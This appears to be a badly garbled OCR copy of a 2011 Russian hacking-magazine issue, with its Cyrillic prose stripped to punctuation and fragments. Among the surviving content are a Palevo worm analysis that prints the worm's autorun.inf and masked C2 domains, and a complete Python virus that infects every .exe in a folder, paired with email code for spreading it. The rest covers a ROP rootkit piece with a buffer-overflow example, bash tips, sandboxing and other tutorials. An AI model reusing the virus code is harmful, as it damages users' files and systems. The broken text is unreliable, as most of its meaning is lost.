: PHP Obfuscator 1.5

: *nix/win
: dx

Rings Skyper sin3v.org.

:
1. ;
2. ;
3. ;
4. .
:
PHP

PHP- PHP Obfuscator dx.
:
;
;
;
PHP;
INTEGER;
;
;
-;
PHP;

c
.
;

( );

( );
;

;
;
Skype,
;
, -;
;
3-5 .
,

:).
z
073
MALWARE
, Senior Malware Analyst, Heuristic detection group, Kaspersky Lab
PALEVO!
Palevo
Mariposa. ,
2010 .
:
autorun.inf ,
, , .
, Palevo
.
.
PE 166 ,
. ,
, Explorer. ,
, ,
. String Table,
. , . Resource Hacker.
: .text, .rdata, .data .rsrc,
, -,
Gjgpycll. , .

Hiew? ,
074
PE- . .
, . , ,
. .
,
.
Hiew . ,
, , , , PE-.
.
IDA, Hex-Rays.
, ,
X 03 /146/ 2011
>> coding
Palevo
API-. , GetCommandLineW
EAX. ,
, , API EAX
.
.
. OpenProcess, ,
,
. , ESP,
MOV ecx, [esp-1Ch]. Windows XP (ESP
0x1C), , 0xFFFFFFFF.

RETN.
Palevo. ,
, , . :
add
inc
cmp
jl
d , [eax] * 4 [000424C3A], 06B9700BA

eax
eax, 00000013D
000401110
ADD.
VirtualAlloc ,
.
.
. kernel32.dll
PEB .
, ,
, PE,
Hiew, .
, ADD.

. , , ,
Morphex PE32 Loader. ,

PE-. ,
,
.
, Palevo.
,
. MSVC8
. :
, . X 03 /146/ 2011

explorer.exe.
Hex-rays ,
. ,
,
Progman , , ID , . ,
VirtualAllocEx, -
WriteProcessMemory
CreateRemoteThread. , Progman
Windows Explorer. , ,
-, explorer.exe. ?
, :
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Winlogon\TaskBar . ,
TaskBar ,
, .
autorun.inf. , , ,
. autorun.inf :
shellexecute=vikipiki\\\rajlaus.exe
action=Open folderto view files usingWindowsExplore
USEAUTOPLAY=1
075
MALWARE
000

,
open=vikipiki\\\rajlaus.exe
icon=shell32.dll,4
shell\\\Install\\\command=vikipiki\\\rajlaus.exe
shell\\\open\\\command=vikipiki\\\rajlaus.exe
shell\\\explore\\\command=vikipiki\\\rajlaus.exe
Shell\\\open\\\command=vikipiki\\\rajlaus.exe
shellexecute=vikipiki\\\rajlaus.exe
, ,
:
******.ananikolic.su
****.pickeklosarske.ru
*****.pornicarke.com
*****.losmibracala.org
92.***.*90.237
.
, :
DONE!
FAIL!
Drive infected: %c
USBS stopped, %d infected
USBS not running
USBS already running
USBS started
Advertising: %s
Adware2 stopped, %d URLs displayed
Adware already running
Adware not running
Adware2 running: %d browsers, %d URLs
Error=%d, GLE=%d
Already downloaded id=%d
Downloading %s to %s
Done, %s
, Palevo
. ,
- .
,
Hiew / IDA.
, . ,
-
,
API . :)?
, , ,

explorer.exe.
autorun.inf . , Palevo
, ,
, . , ,
. z
Icon Group String Table`, Palevo
076
X 03 /146/ 2011
MALWARE
deeonis deeonis@gmail.com
Python

. ,
, ,
, ,

, , :
, , .
Python , .
, ,
HLLx (High Level Language, x ).
HLLx-:
(Overwrite) HLLO, (Companion) HLLC
(Parasitic) HLLP.
, ,
. .

. .
- , . , HLLC-
078
, (
. .) - . ,
,
. , . HLLP
-.
-, . -
,
, .
, , ,
, .
, HLLO-, HLLC- , -. ,
-.
,
.
HLLP-, . ,
X 03 /146/ 2011
>> coding
.
. , ,
,
.
:
HLLP-
import sys
import os
import shutil
virPath = os.path.split(sys.argv[0]);
names = os.listdir('.');
fvir = open(sys.argv[0], 'rb');
virData = fvir.read(19456);
for name in names:
namePair = os.path.splitext(name);
if namePair[1] == '.exe' and \
name != virPath[1]:
os.rename(name, name + 'tmp');
fprog = open(name + 'tmp', 'rb');
progData = fprog.read();
fnew = open(name, wb);
fnew.write(virData + progData);
fnew.close();
fprog.close();
os.remove(name + 'tmp');
origProgData = fvir.read();
origProg = 'original_' + virPath[1];
forig = open(origProg, 'wb');
forig.write(origProgData);
fvir.close();
forig.close();

virPath = os.path.split(sys.argv[0]). ,
, .
if . fvir.
read(19456). 19456 (
, ,
). ,
.
exe . , ,
,
,
.
WARNING
warning
.

!
,

,

os.execl(origProg, ' ');
: sys, os,
shutil. sys ,

. , , sys.argv[0].
os ,
. ,
,
. , shutil
.

, .
os.listdir('.')
,
.
, , .
, ,
if :
name != virPath[1],
X 03 /146/ 2011
079
MALWARE
000
, Linux -

os.remove(name+'tmp').
,
.
( , 19456 ?), exe, .
,
.
, .
, ,
,
. ,
,
, .
.
.
,
.
,
.
, .
,
. ,
e-mail.
, Python
. , :
080

import smtplib
from email.mime.text import MIMEText
msg = MIMEText('Message text')
# me == email
# you == email
msg['Subject'] = 'Test message'
msg['From'] = me
msg['To'] = you
s = smtplib.SMTP('')
s.sendmail(me, [you], msg.as_string())
s.quit()
smtplib
MIMEText. , . , ,
SMTP-.
,
. ,
.
.
:

import smtplib
import mimetypes
from email import encoders
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
X 03 /146/ 2011
>> coding

outer = MIMEMultipart()
# me == email
# you == email
outer['Subject'] = Test message
outer['From'] = me
outer['To'] = you
ctype, encoding = mimetypes.guess_type(path_to_file)
if ctype is None or encoding is not None:
ctype = 'application/octet-stream'
maintype, subtype = ctype.split(/, 1)
fp = open(path_to_file, rb)
msg = MIMEBase(maintype, subtype)
msg.set_payload(fp.read())
fp.close()
encoders.encode_base64(msg)
msg.add_header('Content-Disposition',
'attachment', filename=file_name)
outer.attach(msg)
s = smtplib.SMTP('')
s.sendmail(me, [you], outer.as_string())
s.quit()
mimetypes,
encoders, MIMEMultipart MIMEBase. MIMEMultipart
-
(, ). MIMEBase , exe.
MIMEMultipart MIMEBase, base64 .
,
X 03 /146/ 2011
, ,
e-mail.
. , ,
, .
Outlook.
Python Win32 Extensions.
:
, exe .
Windows?.
exe. -, .
( , ,
][,
:)),
.
, , win-,
, .
os.path.split(). ,
-, sys.argv[0] (, virus.py). exe
(C:\Windows\virus.exe).
, os.path.split().
19456.
, exe, .
.
, Python , ,
. ,
:). z
081
UNIXOID
grinder@tux.in.ua
zobnin@gmail.com
adeptg@gmail.com
,
. ,
,
, , . ,
,
.

bash
PS1.
man-,
,

, -
082
. , , Ubuntu
PS1 :
'${debian_chroot:+($debian_
chroot)}\u@\h:\w\$ '

:
@_:_$
, '\u',
'\h',
'\w'. ,
debian_chroot,
,
chroot-. , , ,
, bash
.
X 03 /146/ 2011
INFO
info
FreeBSD
rsync

.

<Ctrl+T>
cp,

.
bash
alias, ,

, . :
\d
\j
\A
\!
, PS1
, ,
PS1 ,
, , ,
( $?),
, .
'\n' PS1,
,
(
):
PS1='\n\w\n\u@\h:$?\$ '
. chroot ,
,

. ,
, gmail
Wi-Fi:
$ vi ~/.bashrc
# Google-
weather(){
# ?
local city="Moscow"
curl -s "http://www.google.com/ig/
api?weather=$city" | sed 's|.*<temp_c data="\
([^"]*\)"/>.*|\1|'
}
# Google-
X 03 /146/ 2011
unread_mail(){
# ( @gmail.com)
local login=""
local password=""
wget --secure-protocol=TLSv1 --timeout=3
-t 1 -q -O https://${login}:${password}@
mail.google.com/mail/feed/atom --nocheck-certificate | grep fullcount | sed
"s/<fullcount>$.*$<\/fullcount>/\1/"
}
# Wi-Fi
wifi(){
/sbin/iwconfig wlan0 | grep Quality | cut -d
= -f2 | awk '{print $1}'
}
PS1='\n`weather`:`unread_mail`:`wifi`:\w\n\
u@\h:$?\$ '
~/.bashrc
600, .
:
-7:32:70/70:/usr/local
j1m@1313:0$

man-
,
most

export
MANPAGER="/usr/
bin/most -s
~/.bashrc.
stty
-echo

,
.

.

setterm -cursor off
setterm -blank 0.
.
.
escape-
, .
escape- \[\033[
\], m.
. ,
0;30, 0;32,
0;31, 1;33, 1;37 .
( h)
(u), ,
(w), ~/.bashrc
PS1 :
HTTP://WWW
links

fortune-mod-ru:
jack.kiev.ua/fortunemod-ru
bashDirB (Directory Bookmarks for BASH):
dirb.info/bashDirB.
PS1="\[\033[0;31m\]\u@\h:\[\033[1;33m\](\w)\
083
UNIXOID
bash
[\033[0m\]\[\033[0m\]"
.
40 () 47 ().
PS1="[\033[32;40m\w\[\033[0m\]>"
, , , ,
. :
local GRAY="\[\033[1;30m\]"
local NO_COLOUR="\[\033[0m\]"
bash?
, bash
.
compgen, .
/etc/bash_completion ( ~/.bash_completion),
/etc/bash_completion.d,
, .
bash
.
, MPlayer avi mpg, :
complete -f -X !*.@(avi|mpg|AVI|MPG/so) mplayer
,
. :
alias ls='ls --color=auto'
alias grep='grep --color=auto'
.
dircolors, LC_COLORS.
, :
, MPlayer
, , , , .
case. ,
.

bash_completion. .
, tar :
COMPREPLY=( $( compgen -W 'c t x u r d A' -- "$cur" ) )
$ dircolors --print-database
/
etc/DIR_COLORS ( ~/.dir_colors),
.
cout (code.google.com/p/cout)
Python, make, gcc, svn
diff. ,
, :
$ alias makec='cout data/make-gcc.cfg'
, Makefile:
$ makec -f Makefile
bash
, bash <Tab>. , ,
.
-.
, Linux-,
, bash ,
. Gentoo ( Calculate Linux) .
. ?
084
, , bash .
compgen . '-b'
, '-c' , '-v'
. man-
bash, complete compgen.
Bash , .
dotfiles
dotfiles (IP- 192.168.1.1,
10000) netcat pv:
host1$ tar -cf dotfiles | pv | nc -l -p 10000 -q 5
host2$ nc 192.168.1.1 10000 | pv | tar -xf -
, host1 OpenBSD, :
obsdhost1$ tar -cf dotfiles | pv | nc -l 10000
X 03 /146/ 2011
-

, , setterm stty.
shopt -p (shopt
Shell Options). :
autocd ,
( cd), ;
cdspell bash (, /ect/init.d /etc/init.d) cd;;
checkjobs , ;
cmdhist ,
;
dirspell
;
globstar **, , , ;
wildchar ,
mp3 :
$ ls **/*.mp3
, , :
LC_COLORS
:
1. Bash ,
. PROMPT_DIRTRIM.
,
, . :
$ find ./ -name "*.mp3" -type f -print

$ export PROMPT_DIRTRIM=3
2. Bash ,
$ shopt -s autocd cdspell checkjobs cmdhist dirspell
globstar

, :
$ vi ~/.bashrc
twit()
{
curl --basic --user : --data
status="$*" 'http://twitter.com/statuses/update.
xml' -o /dev/null;
}
:
$ twit ' '
140 .
X 03 /146/ 2011
ls.
ls, bg, fg, exit
:
$ export HISTIGNORE="&:ls:[bf]g:exit"
3. Bash , , sudo, root'

.
/etc/bash.bashrc:
export HISTFILE=$HOME/.bash_hist-`whoami`

, .
, mc, ,
. ,
, sync? rsync,
,
. ~/.bashrc :
085
UNIXOID
fish
alias cpr='rsync --progress'
cpr cp:
Directory Bookmarks for BASH (dirb.info/bashDirB)

,
.
:
$ cpr file1 file2

$ wget -c http://www.dirb.info/bashDirB -o ~/.bashDirB
'--remove-source-files',
(, ,
mv rsync).
,
.
, , ,
pv (Pipe Viewer). cat,
, .
:
$ tar -czf /path/to/dir | pv > /path/to/archive.tgz
758MB 0:01:29 [8,48MB/s] [
<=>
. .
pv ( ) '-s':
$ tar -czf /path/to/dir | pv -s $(du -sb /path/to/dir |
grep -o '[0-9]*') > /path/to/archive.tgz
461MB 0:00:21 [ 32MB/s] [=============================
==========>
] 60% ETA 0:00:13
,
.

. Bash
(, ,
cd, cd -), .
, (aliases), :
alias cdwww='cd /var/www'
, .
. , ,
~/.bashrc .
086
~/.bashrc :
source ~/.bashDirB
. :
$ cd /var/www
$ s www
~/.DirB/www,
. ,
, g www. .
. , p :
$ p www
/var/www
~
How much is the FISH?

FISH
(Friendly Interactive Shell). bash . Fish .
, , , (, ,
). Fish ,
, ,
, . ,
Fish sh.
X 03 /146/ 2011
tar
bash4
, , s1 .
'-r'.
, bashDirB
PS1 ,
history. ,
.
bashDirB apparix
(micans.org/apparix), : bm (
), to ( ) portal ( ). bash csh.
Debian/Ubuntu
.
Linux- . ,

. fortunes, .

, .
Debian Ubuntu, :
$ fortunes -f
/usr/share/games/fortunes, .
'-m'
, .
strfile
(strfile _).
RSS-, ,
, . fortunes
cowsay xcowsay. owsay Perl,
,
ASCII-.
$ sudo apt-get install cowsay xcowsay
, ,
. , uptime:
$ uptime | cowsay
( Linux Mint):
$ sudo apt-get install fortunes fortunes-debianhits fortunes-ubuntu-server fortunes-min fortune-mod
fortunes-ru

. , ,
fortunes-ru
(, linux.org.ru: lorquotes.ru/
fortunes.php).
.
~/.bashrc
:
$ echo "fortune" >> ~/.bashrc
( source ~/.bashrc). C
, :
X 03 /146/ 2011
$ cowsay 'fortune'
, /usr/share/cowsay/
cows. '-f'.
: '-t' ,
'-p' , '-w' . , ~/.bashrc:
COWDIR=/usr/share/cowsay/cows/;
COWNUM=$(($RANDOM%$(ls $COWDIR | wc -l)));
COWFILE=$(ls $COWDIR | sed -n ''$COWNUM'p'); fortune |
cowsay -f $COWFILE
, . , ,
, . z
087
UNIXOID
zobnin@gmail.com

, -
.
, ,
UNIX-

.

, ,
.
,
( Windows
, UNIX
, ).
, ; 95%
Ubuntu,
deb-; xspy;
KDE GNOME,
, ,
088
... .
, , ,
,
.

,
Linux
chroot, FreeBSD
jail (), Solaris (,
, ).

,
. ,

.
,
, (
, , )
.
, .
, chroot
, .

,
, /
,
.
, .
, -
,
.
,
.
, ( ,
, ).
X 03 /146/ 2011
named systrace

,
,
- .
, .
,
: (
)
sudo. , , ,
KDE GNOME.

(600, ),
.
,
,
Linux,
,
(,
,
). .
,
,
.
, , ,
, ,
, ,
,

.
X 03 /146/ 2011

(, ,
). , Linux

.

,
, .
Linux
:
1. (HIDS),
SELinux AppArmor, ,
.
,
sandbox,
.
2. ptrace ,
,
.

,
, plash, sydbox systrace,
.
3. . Plan 9 Linux
procfs UTF-8,
clone()
. Linux, 2.4.19,
. , ,

/dev/sda1, ,
/dev/sda5, /home, procfs /proc,
INFO
info

,

,

fakeroot,

,

root (

).
QubesOS (qubesos.org) Linux,

.
sandbox,
SELinux,

/
home/$USER /tmp.

'-H' '-T': sandbox
-H ~/fakehome -T ~/
faketmp vi.
089
UNIXOID
Sandbox
/dev/sda2,
, /dev/sda7, /root, /proc.
, , .
,
. 2.6
,
IPC. ,
, ( ) IPC.
LXC ,
, (stgraber.org).
4. seccomp
, , exit(), read() write()
, . ,
GRID ( ,

), Google
Chrome.
,
,
. , web-

exec() /etc/passwd,
, ?
:
1. ,
SELinux AppArmor.
, .
SELinux , ,
.
2. -. , .
,
TCP- - - .
, .
SELinux .
3. .

. ,
,
, ,
.
090
4. ,
. ,
Windows,
/ . , , ,

.
, , , ,
.
: sandbox,
SELinux
; systrace, ptrace; python-, .
Sandbox SELinux
Sandbox , SELinux
. SELinux,
, .
,
sandbox, . ,
; ; ,
sandbox, .
,
,
, . ,
sandbox . , , - . :
$ cat /etc/passwd | sandbox cut -d: -f1 > /tmp/users
cut, ,
,
2.2, Linux capabilities,

(,
,
).
X 03 /146/ 2011
systrace
sandbox,

( /etc/passwd)
/tmp/users (
). /etc/passwd,
, :
$ sandbox cut -d: -f1 /etc/passwd > /tmp/users
/bin/cut: /etc/passwd: Permission denied
- . sandbox ,
SELinux. , , ,
( sandbox_t,
system-config-selinux,
Fedora). , sandbox
,
'-t'. , SELinux.
X 03 /146/ 2011
,
sandbox
. '-X',
. -, X- Xephyr, X-

X-. Xephyr
Matchbox,
( Xephyr,
X-).
/tmp, ,
:
1. SELinux
$HOMEDIR /tmp.
2. SETUID- /usr/sbin/seunshare,
, ID SELinux .
3. seunshare ( , )
$HOMEDIR /tmp.
4. , X- /home /tmp.

SELinux: sandbox_file_t,
/tmp,
.
, ,
sandbox_web_t ( HTTP)
sandbox_net_t ( ):
$ sandbox -X -t sandbox_web_t firefox google.com
SElinux
selinux-policy 3.6.12
policycoreutils 2.0.62.
091
UNIXOID
SYSTRACE /SYSJAIL SMP EXPLOIT
, OpenBSD/NetBSD- systrace, 2007
Systrace
, systrace system call interposition, NetBSD

OpenBSD, Linux,
ptrace- ( , )
,
.
systrace (
sandbox) ,

.
,
. , , strace.
Linux systrace ,
OpenBSD, :
$ systrace -t ls
,
, .
, , permit
() deny ().
, ,
.
systrace ,

, ,
, , exec().
systrace ,
'-A':
$ systrace -A ls
$ sudo apt-get install build-essential \

libevent-1.4-2 libevent-dev
$ wget http://www.provos.org/uploads/systrace-1.6g.tar.gz
$ tar -xzf systrace-1.6g.tar.gz
$ ./configure --prefix=/usr/local && make
$ sudo make install
systrace .
:
$ systrace ls
xsystrace .
xsystrace systrace,
:
092
~/.systrace:
$ ls -l /home/j1m/.systrace/
-rw------- 1 j1m j1m 631 2011-01-04 12:24 bin_ls
, ,
, ,

.
sandbox-2
Sandbox, ,
, , . X 03 /146/ 2011
systrace
,
,
, .
, , ,

, - .
, :
1. ( $NEWROOT) copy-on-write
( aufs).
2. /home $NEWROOT/home.
3. .
4. procfs $NEWROOT/proc.
5. chroot $NEWROOT .
,
,
, , /home ( ),
. IPC
, , . X 03 /146/ 2011
, .
,
:
$
$
$
$
sudo apt-get install bzr

bzr branch lp:~stgraber/+junk/sandbox
cd sandbox; make
sudo make install
sandbox-gui,
( , /home /tmp)
. , .

, Linux
.
,
,
, .
z
093
UNIXOID
iv ivinside.blogspot.com
-
-
Liberte Linux:

: ,

. ,
Liberte
Linux.
Liberte
Liberte Linux
LiveUSB-, ,
.
,
() , ,
.
,
,
:
(
Hardened Gentoo Linux);
;
;
Tor;
Tor (
094
2011.1);

.
,
Gentoo, , , . ,
SD-,
. , GTK; Openbox; X-
TrueType .
unicode- , .

Hardened Gentoo,
, SSP ( -
) ASLR (
).
:
Midori 0.2.8 , WebKit GTK;
Claws Mail 3.7.6

,
GnuPG;
Sakura 2.3.8 , VTE;
Audacious 2.4.0
(mp3, ogg, flac, ape);
GNOME Mplayer 0.9.9.2
GNOME , mplayer GTK;
PCManFM 0.9.7
(Midnight
Commander );
X 03 /146/ 2011
,
Liberte Linux: -
Evince 2.30.3 pdf ( DjVu);
Abiword 2.8.6, Gnumeric 1.10.6
Microsoft Word Excel.

(
dee.su/liberte, ),
256 .
, .
, 128 Pentium
Pro.
Linux:
1. : mkdir /
media/usbstick.
2. : mount /dev/sdb1 /media/

usbstick.
3. :
unzip liberte-2010.1.zip -d /media/usbstick.
4. :
cp /media/usbstick/liberte/setup.sh /tmp/
setup.sh.
5. : chmod +x /tmp/setup.
sh.
6. : umount /dev/sdb1.
7. : /tmp/setup.sh
syslinux
4.02,
.
Arch Linux,
syslinux 4.03 - :
$ head -n5 setup.sh
#!/bin/sh -e
# syslinux
sysver=4.03
# mbr.bin ( find /
-name mbr.bin)
sysmbr=/usr/lib/syslinux/mbr.bin
Windows ,

setup.bat .
syslinux , .
It's easy to use!
, BIOS' , Liberte,
X 03 /146/ 2011

. , ,
, (Alt+F2). ,
,
.
usermod -U root passwd.
sudo,
,
.
Liberte Linux ,
OTFE
AES-256
XTS.
,
otfe-resize.

, .
$ cat /etc/conf.d/liberte
#
OTFEFILE=/otfe/liberte.vol
OTFELABEL="Liberte OTFE"
# ,
(A/B)
OTFESIZE=1/4
DVD
dvd
, ,
Liberte
Linux
Linux
Windows.
INFO
info
Install
Liberte
Linux

VirtualBox
.

FAT(16)
USB-.
# ,

OTFECIPHER=aes-xts-plain
OTFEKEYSIZE=256
OTFEHASH=sha256
# LVM
# ( otfe-resize)
OTFEVOLUME=otfe

GnuPG
GPA, .

OTFE.
, .
Midori
095
UNIXOID
Liberte Linux
splash-
Tor. ,
Tor,
(, DNS-, ,
DHCP-, ),
.
, iptables -L .
DHCP, DNS, NTP Tor, DHCP ,
, ARP IPv4LL (IPv4 Link-Local Addresses) .
Wi-Fi MAC-
mac-randomize. , Liberte
, DNS
web-.
: ,
( ),
.
,
, M-16 .

,

. Liberte Linux

,
. , , 2011.1, , ,
.
,
, Claws-Mail. ,
, IRC XChat IM- Pidgin ,
.
mp4- Speex .
, Liberte , ,
Compiz. Liberte
, . , : , ,
.
Maxim Kammerer <mk@dee.su>, .
Liberte . Linux , Gentoo.

, rsync,
.
SquashFS Tools 4.1.
-
4 .
Privatix Live-System
.
Debian CD-, USB-.
USB LiveCD.
UsbCryptFormat,
CryptBackup
. Firefox
Torbutton.
3 .
096
Liberte Linux 2011.1
DemocraKey LiveCD
. ,
, . ,
,
, .
, ,
,
. : Tor,
(Pigdin + OTR).
X 03 /146/ 2011
!
:
1. (
svn,
):
svn co https://liberte.svn.sourceforge.net/
svnroot/liberte/trunk/liberte liberte
2. /tmp/livecd:
liberte-2010.1-src/build /tmp/livecd
- svn, sourceforge.net:
$ wget https://downloads.sourceforge.net/
project/liberte/2010.1/liberte-2010.1-src.
tar.bz2
$ tar xjf liberte-2010.1-src.tar.bz2
$ mv liberte-201X.Y-src liberte
build fresh,
.
Liberte Linux LiveUSB-.
src/var/lib/portage/world
(, ,
) -
The (Amnesic) Incognito Live

System
Incognito
LiveCD , . , Incognito LiveCD,
CD-, .
, , -,
Tor, -,

.

GNOME,
GTK- (Firefox, OpenOffice, Pigdin
OTR )
2 ! , iso,
VirtualBox.
X 03 /146/ 2011
(
)
,
.
.
gentoo-portage.
com/browse.
/home/anon/ , , (, , ).
, , /etc.
Tor
. -, SSH-
, IP- .
, , ,
. ,
Tor e-mail ,

Liberte
Tor. (2010.1
)
, .
Liberte Linux I2P (
) , , DHT Kademlia, ,
, AES
IP-, ,
Network database .
.
,
mk@dee.su.
WARNING
warning
,
,

,
.
HTTP://WWW
links
dee.su/liberte
Liberte
Linux;
amnesia.boum.org
T(A)ILS;
mandalka.name/
privatix
Privatix LiveSystem;
sourceforge.net/
projects/democrakey

DemokraKey;
i2p2.de/intro_ru.html

;
- ,
. MS ,
:
z
097
CODING
stannic.man@gmail.com
RETURN-ORIENTED
ROOTKITS !

.
, ,

?

, , .
.
, -
098
. ,
, ,
.
, ,
( ).
X 03 /146/ 2011
>> coding

,
, ,
, ,
, (root certification authority,
). , , , . ,

Microsoft, Windows XP. ,

,
() ,
. ?
,
.
, ,
:
( ,
WRITABLE |
EXECUTABLE).
OpenBSD 3.3, , PaX ExecShield Linux.
Windows
Data Execution Prevention (DEP),
Windows XP SP 2 Windows
Server 2003.
DEP .
2 (SP2) Windows XP
32- Windows : no-execute page-protection
(NX), AMD,
Execute Disable Bit (XD),
Intel. ,
DEP,
( ,
).
DEP : support.microsoft.com/
kb/875352/ru.
,
,
.
memory shadowing. ,
X 03 /146/ 2011
.
VM

. ( ,
)

.

,
. , , -
,
.
win-
Win2k Linux 2.4. ,

QEMU, VMware VirtualBox.
, , , .
,
-
(). - ( ,
)

. ? . ,
/,
,

. .
, .
.
. ,
return( __asm ret
), ( ) .
, return

-.
DVD
dvd

.

,

,
19 ,

,

.
099
CODING
?

, , .
ret . -,
4 EIP . -, ESP 4 ,
(2 ) ,
EIP.
, .
,
ret,
.
, return
. , -
ASM , , return- POP EAX; JMP EAX. ,
ret,
EAX
. return-

.
, ret
return- ? . 86- ret (3)
1/256.
, ( ,
) , .

,
.
100
Pro & Cons
- , ,
.
,

. ,
( EIP
ESP), .
#1:
? , , , :).
. , .

EIP -
.
,
. ESP
,
. , ,
,
EIP.
#2: vtable
++
C++ ,
(vtable).
, vtable, ,
? ,
,
, X 03 /146/ 2011
>> coding

vtable ,
.

. ,

. ,
vtable, , .
#3:

vtable,

.
-, ,
- .

. ,
.
#4:
setjmp
Linux . setjmp longjmp,

goto.
, ,
,
setjmp
jmp_buf,
EBX, EDI, ESI, EBP, ESP EIP. , ? EIP
CALL ,
ESP. setjmp
EAX .
longjmp.
, EAX , longjmp, ESP .
X 03 /146/ 2011
setjmp/longjmp
struct foo
{
char buffer[160];
jmp_buf jb;
};
int main( int argc, char **argv )
{
struct foo *f = malloc( sizeof(*f));
if( setjmp(f->jb) )
return 0;
strcpy( f->buffer, argv[1] );
longjmp( f->jb, 1 );
}
strcpy( f->buffer, argv[1] ).

-, . *nix ,
:).
, ? ,
.
, - , !
,
.
.
, ,
.
-
.
,
,
.
! z
HTTP://WWW
links

, ,
,

-
( MSDN
).

, .

blog.
threatexpert.com
alex-ionescu.com.
101
CODING
seva@vingrad.ru
AppleScript
MAC OS X
AppleScript
, AppleScript,
,
.

, . ,
,
GUI-, , .

shell, Perl, PHP . ( )
Mac OS X.
, Mac OS X . AppleScript.
AppleScript System 7.
HyperCard (
HyperTalk, ), AppleScript
, ,
. AppleScript
:

. ,
Mac OS X AppleScript , Cocoa
AppleScript .

Script Editor.
102
/Application/AppleScript.
HelloWorld .
display alert "Hello World!" #
say "Hello World" #
, , ,
AppleScript c
say. Apple
:). , . ,
:

display alert "Hello World!" buttons {"Hello", "Bye"}
set answer to button returned of the result
if answer is "Hello" then
...
else
...
end if
- . , :
#
set theFile to (choose file with prompt
"Select a file to read:" of type {"TEXT"})
open for access theFile
X 03 /146/ 2011
>> coding
, iTunes
AppleScript
#
set fileContents to (read theFile)
close access theFile
AppleScript
.
, . -
.
AppleScript
:
tell application "Microsoft Word"
quit
end tell
C tell ,
. MS Word . tell end tell . , ,
. , . iTunes, ,
AppleScript:
iTunes
tell application "iTunes"
play the playlist named "My Favorite"
end tell
, AppleScript, ,
( AppName.scriptRerminology ).
Script Editor File Open Dictionary ..., .
,
, . , , :
.
, Mac-: open, print,
close quit.
.
AppleScript
Objective-C/Cocoa, ,
AppleScript.
X 03 /146/ 2011
Script Editor
Cocoa-
NSAppleScript. iChat .
NSAppleScript *iChatGetStatusScript = nil;
iChatGetStatusScript = [[NSAppleScript alloc]
initWithSource:
@"tell application \"iChat\"
to get status message"];
NSString *statusString =
[[iChatGetStatusScript
executeAndReturnError:&errorDict] stringValue];
, ,
,
, . ,
.
Cocoa-
ocoa,
AppleScript, ,
AppleScript,
, , , , .
AppleScript, .
.scriptSuite .scriptTerminology .sdef. XML, sdef
.
scriptTermonology Script Editor
.
AppleScript .
scriptSuite- Plist Editor, , :
AppleEventCode ,
AppleScript (
);
Name ,
.
,
sdef-.
sdef-
<?xml version="1.0" encoding="UTF-8"?>
103
CODING
SAFARI.scriptSuite Plist Editor-

<!DOCTYPE dictionary SYSTEM "file://localhost/
System/Library/DTDs/sdef.dtd">
<dictionary title="My Application Terminology">

<suite name="My Application Scripting"
code="XXXX"
description="Commands and classes">
<classes>
<class name="application" code="capp"
description=""
inherits="NSCoreSuite.NSApplication">
<cocoa class="NSApplication"/>
<properties>

<property name="some value "
code="sval" type="string"
description="A value ">
<cocoa method="value"/>
</property>
</properties>
</class>
</classes>
</suite>
</dictionary>
sdef - ,
.scriptingSuit-. ,
Cocoa-, AppleScripting.
Cocoa Info.plist Scripting OSAScriptingDefinition sdef:
Info.plist
...
<key>NSAppleScriptEnabled</key>
<true/>
<key>OSAScriptingDefinition</key>
<string>Scrtipting.sdef</string>
Scripting.sdef :
Scripting.sdef
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE dictionary SYSTEM
"file://localhost/System/Library/DTDs/sdef.dtd">
<dictionary xmlns:xi=
"http://www.w3.org/2003/XInclude"
title="Scripting dictionary">

<xi:include
href="file:///System/Library/
104
NSApplications
ScriptingDefinitions/CocoaStandard.sdef"
xpointer="xpointer(/dictionary/suite)"/>
<suite name="Scripting" code="VVVV"
description="Test Scripting">
<class name="applicaton" code="capp"
description="">
<cocoa class="NSApplication"/>

<property name="myprop"
code="Smrp" type="string"
access="r"/>
</class>
</suite>
</dictionary>
, AppleScript
myprop. ObjC-, .
NSApplication,

.
#import <Cocoa/Cocoa.h>
@interface NSApplication (Scripting)
- (NSString *) myprop;
@end
@implementation NSApplication (Scripting)
- (NSString *) myprop
{
return @"This is my property";
}
E AppleScript , :
tell application "Scripting"
properties
end tell
, AppleScript Cocoa- .
.
. z
X 03 /146/ 2011
CODING
Spider_NET , vr-online.ru
AIR
Adobe AIR
- -
. ,

web- HTML+CSS+JavaScript.
! Adobe AIR
.
AIR ,
. C++
WinAPI. AIR ,
. , : .
What is Adobe AIR
. Adobe AIR (Adobe Integrated Runtime)

.
106
HTML/CSS, Ajax, Adobe Flex Adobe Flash.

web-
(RIA Rich Internet Applications) .
Adobe AIR, , . (Windows, MacOS, Linux,
QNX, Android), .
, Windows Mobile/Windows Phone.
, , X 03 /146/ 2011
>> coding
AIR-
, AIR- . ,
. . AIR,
, Titanium
(. ).
,
.
, , Adobe AIR,
. , ,
web-
. . Adobe AIR
, .

( , , drag and drop
).
AIR-
AIR- ( ) Adobe AIR.

, , Adobe AIR. ,
Windows, unix-like
.
AIR
,
Adobe AIR. ? , .
.

AIR, SDK
.
(get.adobe.com/air/).
,
, .
, Adobe (,
Dreamweaver), , , ,
Aptana Studio (aptana.
com). , Eclipse, Aptana Studio Aptana
Eclipse, web- (html,
css, js). Aptana AIR
,
(aptana.com/products/air).
Hello world

Adobe AIR.
, Aptana
Studio. , ,
.
HelloWorld.
, (
General Project). Aptana
X 03 /146/ 2011
Aptana Studio
, .
, , .
?
AIR AIR.
. ,
. ,

.
,
. , ,
. .
Properties Project Natures.
, natures. AIR Nature.
OK.
. .

. ,
. :
, , .
- .

, .
AIR-,
:
1. . ,
.
,
.
. ,
. .
, ? .
, SDK. , ,

AIR. .
2. .
AIR- web- , ( ).
. , CSS, ,
. -
107
CODING
html-,
.
,
Hello, World (
F**ck you, World,
..). C ,
application.xml.
AIR-, -
. : , ,
, . application.xml. ,
.
.
, ?

<?xml version="1.0" encoding="utf-8" ?>
<application xmlns="http://ns.adobe.com/air/
application/1.0">
<id>com.xakep.HelloWorld</id>
<filename>Hello World</filename>
<version>1.0</version>
<title>HelloWorld Application</title>
<initialWindow>
<content>HelloWorld.html</content>
<visible>true</visible>
<height>100</height>
<width>300</width>
<x>100</x>
<y>100</y>
</initialWindow>
</application>
HelloWorld
, JavaScript-, .
:
css
//
js
//
images//
//
css-
js

.
: css, images, js.
: application.xml HelloWorld.html. .
.
HelloWorld.html. .
.
html-, swf-.
html-. , HelloWorld.html HelloWorld.html.
HelloWorld.html
<html>
<head>
<title>Hello World from AIR</title></head>
<body>
